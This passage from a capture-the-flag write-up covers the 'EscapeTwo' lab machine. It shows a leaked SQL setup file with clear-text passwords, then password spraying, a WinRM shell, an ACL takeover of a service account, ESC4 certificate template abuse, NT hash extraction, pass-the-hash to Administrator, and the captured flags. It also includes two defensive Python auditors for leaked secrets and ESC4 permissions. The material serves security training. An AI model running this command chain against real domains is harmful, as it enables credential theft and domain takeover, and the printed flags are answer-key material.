AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False" 
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
PS C:\SQL2019\ExpressAdv_ENU>
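
The INI above is an unattended-setup answer file that was left on disk after installation, with both the service-account password (SQLSVCPASSWORD) and the sa password (SAPWD) in clear text. As an added example that is not from the write-up, the following script parses a file in that layout and reports what a defender should clean up; the sample INI, the EXAMPLE domain and the placeholder passwords are constructed, and the checks on SECURITYMODE and SQLSVCACCOUNT are my own assumptions about what is worth flagging.

```python
"""Audit a leftover SQL Server unattended-setup INI for secrets (added example)."""
import re

# Constructed sample in the same layout as the box's sql-Configuration.INI;
# account names and passwords are placeholders, not the real values.
SAMPLE_INI = "\n".join([
    "[OPTIONS]",
    'ACTION="Install"',
    'QUIET="True"',
    'INSTANCENAME="SQLEXPRESS"',
    'COMMFABRICNETWORKLEVEL=""0"',      # doubled-quote quirk seen in the real file
    'SQLSVCACCOUNT="EXAMPLE\\svc_sql"',
    'SQLSVCPASSWORD="example-service-pw"',
    'SQLSYSADMINACCOUNTS="EXAMPLE\\Administrator"',
    'SECURITYMODE="SQL"',
    'SAPWD="example-sa-pw"',
    "IAcceptSQLServerLicenseTerms=True",
])

# Setup parameters that carry a password end in PWD or PASSWORD.
SECRET_KEY_RE = re.compile(r"(PWD|PASSWORD)$", re.IGNORECASE)


def parse_setup_ini(text: str) -> dict:
    """Return {KEY: value} with surrounding quotes stripped and keys uppercased."""
    opts = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#[":          # comments and section headers
            continue
        key, sep, value = line.partition("=")
        if sep:
            opts[key.strip().upper()] = value.strip().strip('"')
    return opts


def mask(secret: str) -> str:
    """Keep two characters so a finding is recognisable, hide the rest."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def audit_setup_ini(text: str) -> dict:
    """Report clear-text secrets plus settings that widen the blast radius."""
    opts = parse_setup_ini(text)
    secrets = {k: mask(v) for k, v in opts.items() if v and SECRET_KEY_RE.search(k)}

    notes = []
    if opts.get("SECURITYMODE", "").upper() == "SQL":
        notes.append("SECURITYMODE=SQL: mixed-mode auth, the sa login works with just a password")
    svc = opts.get("SQLSVCACCOUNT", "")
    if svc and not svc.upper().startswith(("NT SERVICE\\", "NT AUTHORITY\\")):
        notes.append(f"SQLSVCACCOUNT={svc}: domain account, its password is reusable elsewhere")
    return {"secrets": secrets, "notes": notes}


if __name__ == "__main__":
    report = audit_setup_ini(SAMPLE_INI)
    for key, masked in report["secrets"].items():
        print(f"clear-text secret: {key}={masked}")
    for note in report["notes"]:
        print("note:", note)
```

Running this over the installation directories of every SQL Server host is a quick way to find answer files that should have been deleted once setup finished; the masked values are enough to confirm a hit without copying the secret into a ticket.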

In the C:\Users directory we can see that there is also a user account named ryan.

PS C:\Users> ls


    Directory: C:\users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       12/25/2024   3:10 AM                Administrator
d-r---         6/9/2024   4:11 AM                Public
d-----         6/9/2024   4:15 AM                ryan
d-----         6/8/2024   4:16 PM                sql_svc

Let’s confirm that this user account indeed exists on this machine, and check whether there are more user accounts on this machine.

PS C:\Users> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            ca_svc                   Guest
krbtgt                   michael                  oscar
rose                     ryan                     sql_svc
The command completed with one or more errors.

We can not only confirm the existence of the user account ryan, we have also found a new user account ca_svc. This server functions not only as a Domain Controller and Database Server but also as a Certificate Authority. What could possibly go wrong? :-)

I added the newly found usernames to the users.txt file and the password to the passwords.txt file. Let’s try to password spray again.

┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #nxc winrm sequel.htb -u users.txt -p passwords.txt --continue-on-success
...
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\ryan:0fwz7Q4mSpurIt99
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\angela:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\oscar:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\kevin:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\sa:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\rose:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\ca_svc:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (Pwn3d!)

from sql_svc to ryan

The user account ryan has access to the WinRM service. We can now use evil-winrm to obtain a persistent shell on this machine.

┌─[✗]─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #evil-winrm -u ryan -p 'WqSZAF6CysDQbGb3' -i sequel.htb

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Desktop> hostname;whoami
DC01
sequel\ryan
*Evil-WinRM* PS C:\Users\ryan> cd Desktop
*Evil-WinRM* PS C:\Users\ryan\Desktop> ls


    Directory: C:\Users\ryan\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/2/2025   9:02 PM             34 user.txt


*Evil-WinRM* PS C:\Users\ryan\Desktop> cat user.txt
50de8f3a9181478a9b748b18e2e246ef

Privilege Escalation

Enumeration

We always start with the whoami /priv command, but it reveals no interesting privileges here.

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

First, let’s take a step back and take our dog out for a walk.

┌─[✗]─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #bloodhound-python --domain sequel.htb -c all -u ryan -p 'WqSZAF6CysDQbGb3' -dc dc01.sequel.htb -ns 10.10.11.51 --dns-tcp
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.sequel.htb
INFO: Done in 00M 07S

The user account ryan has First Degree Object Control on the user account ca_svc. In other words, ryan holds abusable ACE permissions on the ca_svc object, so we can change the password of the ca_svc user account and maybe abuse the privileges of this user account.

[Figure: BloodHound graph showing ryan’s object control over ca_svc (Hack The Box Write-Up EscapeTwo by T13nn3s)]

We already know that there is a ca_svc user and that ryan has object control over this account. It is likely that the Certificate Authority (CA) role is installed, and if so, we can escalate privileges through common misconfigurations in CA. Let’s check that with PowerShell.

*Evil-WinRM* PS C:\Users\ryan\Documents> get-windowsfeature | ?{$_.installstate -eq "installed"}

Display Name                                            Name                       Install State
------------                                            ----                       -------------
[X] Active Directory Certificate Services               AD-Certificate                 Installed
    [X] Certification Authority                         ADCS-Cert-Authority            Installed
[X] Active Directory Domain Services                    AD-Domain-Services             Installed
[X] DNS Server                                          DNS                            Installed
[X] File and Storage Services                           FileAndStorage-Services        Installed
...

The role is installed! We can now misuse the privileges to transfer the ownership of the ca_svc object to ryan and change the password for ca_svc. Then, we can check with that user account to see if there are any vulnerable certificate templates. First, add ryan as the owner.

(impacket-venv) ┌─[✗]─[root@parrot]─[/home/johnd/htb/machines/escapetwo/impacket/examples]
└──╼ #python3 owneredit.py -action write -new-owner ryan -target ca_svc 'sequel/ryan:WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51
Impacket v0.13.0.dev0+20250530.173014.ff8c200f - Copyright Fortra, LLC and its affiliated companies 

[*] Current owner information below
[*] - SID: S-1-5-21-548670397-972687484-3496335370-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb
[*] OwnerSid modified successfully!

Second, we can grant ryan full control over the user account ca_svc.

(impacket-venv) ┌─[✗]─[root@parrot]─[/home/johnd/htb/machines/escapetwo/impacket/examples]
└──╼ #dacledit.py -action write -rights FullControl -principal ryan -target ca_svc 'sequel/ryan:WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51
Impacket v0.13.0.dev0+20250530.173014.ff8c200f - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250604-224554.bak
[*] DACL modified successfully!

Then, we change the password of the user account ca_svc.

*Evil-WinRM* PS C:\Users\ryan\Documents> Set-ADAccountPassword -Identity 'ca_svc' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force)

With the help of certipy we can use ca_svc to check whether there are any vulnerable certificate templates.

(certipy-venv) ┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #certipy find -u ca_svc -p 'Password123!' -target 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Saved BloodHound data to '20250604225348_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250604225348_Certipy.txt'
[*] Saved JSON output to '20250604225348_Certipy.json'

Let’s read the output.

(certipy-venv) ┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #cat 20250604225348_Certipy.txt
...
    Template Name                       : DunderMifflinAuthentication
    Display Name                        : Dunder Mifflin Authentication
    Certificate Authorities             : sequel-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False 
    Enrollee Supplies Subject           : False 
    Certificate Name Flag               : SubjectRequireCommonName
                                          SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False 
    Requires Key Archival               : False 
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Cert Publishers
       Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions

The template DunderMifflinAuthentication is vulnerable to the so-called ESC4 attack. The user account ca_svc is added to the Security Group Cert Publishers, which is the default setting in Windows when you install the Certificate Authority role. The configured service account for this role is automatically added to this group, which has full control over the certificate template DunderMifflinAuthentication. Since we control this user account, we can exploit this privilege for privilege escalation and obtain the hash for the Administrator account.
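As an added defender-side check (my own code, not part of the write-up or of certipy), here is a small parser for certipy’s text report that flags every template where a principal outside a trusted admin set holds owner or write rights, which is exactly the condition behind ESC4. The sample block is constructed from the DunderMifflinAuthentication entry above, and the trusted set is an assumption you would tune per environment.

```python
# Constructed sample: the DunderMifflinAuthentication block as certipy's text
# report prints it (a real report lists every template, one block each).
SAMPLE_REPORT = """\
    Template Name                       : DunderMifflinAuthentication
    Permissions
      Object Control Permissions
        Owner                           : SEQUEL.HTB\\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\\Domain Admins
                                          SEQUEL.HTB\\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\\Domain Admins
                                          SEQUEL.HTB\\Cert Publishers
"""

# Principals expected to edit templates (assumed set). Any other holder of the
# rights below can rewrite the template (ESC4). Cert Publishers is deliberately
# not trusted: the CA service account (ca_svc on this box) is a member by default.
TRUSTED = {"Domain Admins", "Enterprise Admins", "Administrator"}
WRITE_KEYS = ("Owner", "Full Control Principals", "Write Owner Principals",
              "Write Dacl Principals", "Write Property Principals")

def parse_templates(report: str) -> list[dict[str, list[str]]]:
    """One {field: [values]} dict per template; continuation lines (no ':')
    holding a DOMAIN\\name principal extend the previous field."""
    templates, current, last_key = [], None, None
    for raw in report.splitlines():
        line = raw.strip()
        if ":" in line:
            key, _, value = line.partition(":")
            key, value = key.strip(), value.strip()
            if key == "Template Name":
                current = {}
                templates.append(current)
            if current is None:
                continue  # header and CA lines before the first template block
            current.setdefault(key, [])
            if value:
                current[key].append(value)
            last_key = key
        elif current is not None and last_key and "\\" in line:
            current[last_key].append(line)
    return templates

def find_esc4(report: str) -> dict[str, list[str]]:
    """Return {template name: [untrusted principals holding write rights]}."""
    findings = {}
    for tpl in parse_templates(report):
        risky = []
        for key in WRITE_KEYS:
            for principal in tpl.get(key, []):
                if principal.split("\\")[-1] not in TRUSTED and principal not in risky:
                    risky.append(principal)
        if risky:
            findings[tpl["Template Name"][0]] = risky
    return findings
```

Running find_esc4 over a full certipy .txt report gives you the list of templates to review before an attacker does; resolving group members (here ca_svc via Cert Publishers) is the follow-up step.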

Let’s modify the template.

(certipy-venv) ┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #certipy template -u ca_svc -p 'Password123!' -template DunderMifflinAuthentication -target 10.10.11.51 -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'

We can now request the Domain Admin certificate using the modified DunderMifflinAuthentication template.

(certipy-venv) ┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #certipy req -ca sequel-DC01-CA -u ca_svc -p 'Password123!' -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -target dc01.sequel.htb -upn administrator@sequel.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Once we have obtained the domain admin certificate, we can request the password hash to gain access as domain admin.

(certipy-venv) ┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #certipy auth -pfx administrator.pfx -domain sequel.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff

With a pass-the-hash attack using evil-winrm we can root this machine.

┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #evil-winrm -u administrator -i 10.10.11.51 -H 7a8d4e04986afa8ed4060f75e5a0b3ff

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami; hostname
sequel\administrator
DC01

Read the root.txt file to get the flag.

*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
fe4a821d551e0c9707dd34e3717f35d5

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? I have learned something new when rooting this machine. Every time we all learn new stuff when we are hacking. Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.